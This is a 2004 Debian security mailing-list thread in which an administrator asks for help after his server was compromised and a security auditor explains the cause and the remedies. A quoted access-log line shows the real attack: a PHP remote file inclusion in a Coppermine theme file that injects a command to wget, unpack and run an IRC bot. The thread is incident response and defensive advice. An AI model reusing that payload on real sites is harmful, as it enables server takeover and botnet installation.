RE: Advice needed, trying to find the vulnerable code on Debian webserver.
Thanks for all your help.
The dodgy code has been removed and the server secured !
Thanks again !
--
Ross
-----Original Message-----
From: Steve Kemp [mailto:steve@steve.org.uk] On Behalf Of Steve Kemp
Sent: Saturday, 19 June 2004 11:24 AM
To: Ross Tsolakidis
Cc: debian-security@lists.debian.org
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.
On Sat, Jun 19, 2004 at 10:42:56AM +1000, Ross Tsolakidis wrote:
> Hi all,
>
> I did a search in the logs on some of the suspicious users and found a
> match.
> The files that are being downloaded then executed see to be IRC bots.
> http://www.energymech.net/
>
> Here are some log files.
>
> 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET
>
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
>
la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
> vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0"
200
> 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
>
> All those executables in the /tmp dir seem to be all coming from that
> site on our box, definitely the culprit.
>
> Can someone explain what is going on here ?
> Cause it doesn't make any sense.
There seems to be some buggy PHP code being used on that site, which
is allowing the remote inclusion of content from the mirabella.net
site - this is being abused to run code upon your host.
You should immediately disable the coppermine PHPNuke module and
get it patched, upgraded, or replaced.
Going to securityfocus.com and searching the mailing lists for
coppermine pulls up multiple hits describing problems - for example
this post:
http://www.securityfocus.com/archive/1/361976
Notice the URLs on section E2? They match yours..
See this one for more details too:
http://www.securityfocus.com/archive/1/361976
Two things you can do immediately to stop this particular exploit
are run safe mode for PHP, and firewall off access to mirabella.net.
> What steps should I take now ?
Remove PHP Nuke, check the logs for other activity, make sure your
kernel is patched against local root via the recent wholes, and
look at using a locked down PHP installation - I'm not sure how
PHPNuke will work with that, but it's gotta be worth a try.
Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit
DISCLAIMER: This e-mail and any files transmitted with it may
be privileged and confidential, and are intended only for the use of the
intended recipient. If you are not the intended recipient or responsible for
delivering this e-mail to the intended recipient, any use, dissemination,
forwarding, printing or copying of this e-mail and any attachments is strictly
prohibited. If you have received this e-mail in error, please REPLY TO the
SENDER to advise the error AND then DELETE the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with
it are those of the individual sender, except where the sender specifically
states them to be the views of our organisation.
Our organisation does not represent or warrant that
the attached files are free from computer viruses or other defects. The user
assumes all responsibility for any loss or damage resulting directly or
indirectly from the use of the attached files. In any event, the liability to
our organisation is limited to either the resupply of the attached files or the
cost of having the attached files resupplied.
Reply to: